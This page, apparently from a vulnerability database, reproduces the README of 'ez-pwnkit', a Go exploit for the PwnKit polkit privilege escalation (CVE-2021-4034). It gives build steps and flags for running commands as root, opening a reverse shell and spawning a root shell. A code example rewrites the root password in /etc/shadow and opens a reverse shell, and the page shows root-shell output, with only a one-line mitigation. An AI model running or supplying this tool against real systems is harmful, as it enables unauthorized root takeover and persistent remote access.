CVE-2021-4034 PoC — polkit 缓冲区错误漏洞

Source

Associated Vulnerability

Description

Go implementation of the PwnKit Linux Local Privilege Escalation exploit (CVE-2021-4034)

Readme

# ez-pwnkit

A pure-Go implementation of the **CVE-2021-4034 PwnKit** exploit.

The exploit use `syscall.ForkExec` to survive end of main program.



## Installation

```bash
git clone https://github.com/OXDBXKXO/ez-pwnkit.git
cd ez-pwnkit
make
```



As the exploit relies on a malicious shared library, a **PWN.so** file is generated from ***payload.go*** and embed in the resulting `exploit` executable.

The ***Makefile*** uses `sed` to temporarily change the package name of the ***payload.go*** file to `main`, hence making this ***Makefile*** Linux-only.

As the Go payload is not as reliable as the C one, the ***Makefile*** will compile the exploit with the C payload by default. You can choose to compile with the Go payload using `make build_go`.



## Usage

#### As standalone executable

```
$> ./exploit -h
Usage of ./exploit:
  -c string
        Run command as root in separate process
  -o    Pipe output of forked command to terminal
  -r string
        Open a reverse-shell in separate process. Format: ip:port
  -s    Spawn a root shell
```

The exploit can either be used with a command (`-c`), as a reverse-shell (`-r`) or spawn a root shell (`-s`).



```bash
$> ./exploit -s
sh-5.1#
```

```bash
$> ./exploit -c "cat /etc/passwd"
```

```bash
$> ./exploit -o -c "cat /etc/passwd"
[/etc/passwd content]
```



#### As package

```go
package main

import (
    "github.com/OXDBXKXO/ez-pwnkit"
)

func main() {
    // Change root password to 'password'
    ez_pwnkit.Command(`sed -i -e 's,^root:[^:]\+:,root:$6$eymNRCK.KxwDM6vu$idH0swGW1nsnLb8fT1QibUho5xg7uGJT7fuiheLZHIi9M4gTSk0qIOlUIk2Mm9/Nz5C.T4GkgkmLcK5BtOPkS0:,' etc/shadow`, false)

    // Open a reverse-shell
	ez_pwnkit.RevShell("127.0.0.1:1337")
}

```

Note as `Command` and `RevShell` use `syscall.ForkExec` to run the exploit, resulting processes are separate from the main program and survive its end.

Although **go-PwnKit** can be imported to your project from Github, do not forget that you will execute an untrusted shared library as root. Using a locally compiled `PWN.so` is hence highly recommended. Just sayin' 😚


## Demonstration

```bash
$> ./exploit
sh-5.1# id
uid=0(root) gid=0(root) groups=0(root)
sh-5.1#
```



## Mitigation

Patch `pkexec` if possible, otherwise disable the ***setuid*** bit on the `pkexec` binary.

```bash
chmod 0755 /usr/bin/pkexec
```



## Credits

This project is inspired by several other PoCs of the **PwnKit** exploit.



Thanks to [An00bRektn](https://github.com/An00bRektn/CVE-2021-4034) for the straight-forward exploit setup.

Thanks to [PaterGottesman](https://github.com/PeterGottesman/pwnkit-exploit) and [berdav](https://github.com/berdav/CVE-2021-4034) for the clarity of the exploit explanation.

Thanks to [dzonerzy](https://github.com/dzonerzy/poc-cve-2021-4034) for the *GIO_USE_VFS* trick.

File Snapshot

 [4.0K]  /data/pocs/5854b7975a1829b395dae7334cfbe78add4f3567
├── [4.0K]  cmd
│   └── [ 652]  main.go
├── [3.5K]  exploit.go
├── [  46]  go.mod
├── [4.0K]  internal
│   ├── [ 359]  Makefile
│   ├── [3.0K]  payload.c
│   ├── [2.0K]  payload.go
│   └── [ 22K]  PWN.so
├── [ 404]  Makefile
└── [2.8K]  README.md

2 directories, 9 files

Remarks